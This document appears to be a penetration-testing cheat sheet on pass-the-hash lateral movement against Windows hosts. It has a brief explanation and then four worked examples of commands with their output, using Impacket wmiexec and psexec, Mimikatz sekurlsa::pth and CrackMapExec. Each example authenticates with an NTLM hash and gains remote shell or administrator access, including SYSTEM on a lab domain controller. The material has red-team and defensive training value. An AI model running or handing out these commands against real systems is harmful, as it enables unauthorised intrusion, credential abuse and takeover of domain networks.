======================================================================================================================
Pass-The-Hash attack
======================================================================================================================

Pass-the-hash is a lateral movement technique in which an attacker can abuse the challenge-and-response nature of the NTLMv2 authentication protocol
to authenticate as a user with only the NTLM hash of the user's password.

Numerous tools can be used to perform a Pass-the-hash attack such as the Impacket toolkit (wmiexec.py, psexec.py,..), Mimikatz and CrackMapExec.
> https://github.com/SecureAuthCorp/impacket
> https://github.com/gentilkiwi/mimikatz
> https://github.com/byt3bl33d3r/CrackMapExec
> ...

Index
======
1. WMIexec (Impacket version)
2. PSexec (Impacket version)
3. Mimikatz
4. CrackMapExec

========================================================================================================================
Example 1 - WMIexec (Impacket version)
========================================================================================================================

jeff@kali-Linux:~$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f06237<SNIP> administrator@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\> whoami
win-evagj1t16qd\administrator


========================================================================================================================
Example 2 - PSexec (Impacket version)
========================================================================================================================

jeff@kali-Linux:~$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:k3d089gf890dad5f04d7<SNIP> security-lab/qualys@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 192.168.1.50.....
[*] Found writable share ADMIN$
[*] Uploading file pXRmNpEn.exe
[*] Opening SVCManager on 192.168.1.50.....
[*] Creating service TjVN on 192.168.1.50.....
[*] Starting service TjVN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
TEMP-DC


========================================================================================================================
Example 3 - Mimikatz
========================================================================================================================

mimikatz# privilege::debug
Privilege '20' OK

mimikatz# sekurlsa::pth /user:qualys /domain:security-lab /ntlm:k3d089gf890dad5f04d7<SNIP> /run:cmd
user    : qualys
domain  : security-lab
program : cmd.exe
NTLM    : k3d089gf890dad5f04d7<SNIP>
  |  PID  16182
  |  TID  14854
  |  LUID 0 ; 48678558 (00000000:02e6c69e)
  \_ msv1_0   - data copy @ 000000B9EDE63080 : OK !
  \_ kerberos - data copy @ 000000B9EDDB34E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
 
 mimikatz# 

=> A CMD shell pops up (running as 'security-lab\qualys')

Microsoft Windows [Version 10.0.18363.418]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\> whoami
security-lab\qualys

C:\> Powershell -exec bypass

PS C:\> whoami
security-lab\qualys

PS C:\> Enter-PSSession -Computername TEMP-DC.Security-Test-Lab.Local 
[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\qualys\Documents> hostname
TEMP-DC


========================================================================================================================
Example 4 - CrackMapExec
========================================================================================================================

jeff@kali-Linux:~$ crackmapexec smb 192.168.1.50 -u administrator -H 'ad5f04d33d00db5f06237<SNIP>' --shares

SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [*] Windows Server 2012 R2 Standard 9600 x64 (name:WIN-EVAGJ1T16QD) (domain:WIN-EVAGJ1T16QD) (signing:False) (SMBv1:True)
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [+] WIN-EVAGJ1T16QD\administrator ad5f04d33d00db5f06237<SNIP> (Pwn3d!)
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [+] Enumerated shares
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  Share           Permissions     Remark
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  -----           -----------     ------
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  ADMIN$          READ,WRITE      Remote Admin
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  C$              READ,WRITE      Default share
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  IPC$                            Remote IPC


jeff@kali-Linux:~$ crackmapexec smb 192.168.1.50 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f06237<SNIP>' -x "whoami"

SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [*] Windows Server 2012 R2 Standard 9600 x64 (name:WIN-EVAGJ1T16QD) (domain:WIN-EVAGJ1T16QD) (signing:False) (SMBv1:True)
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [+] WIN-EVAGJ1T16QD\administrator aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f06237<SNIP> (Pwn3d!)
<SNIP>

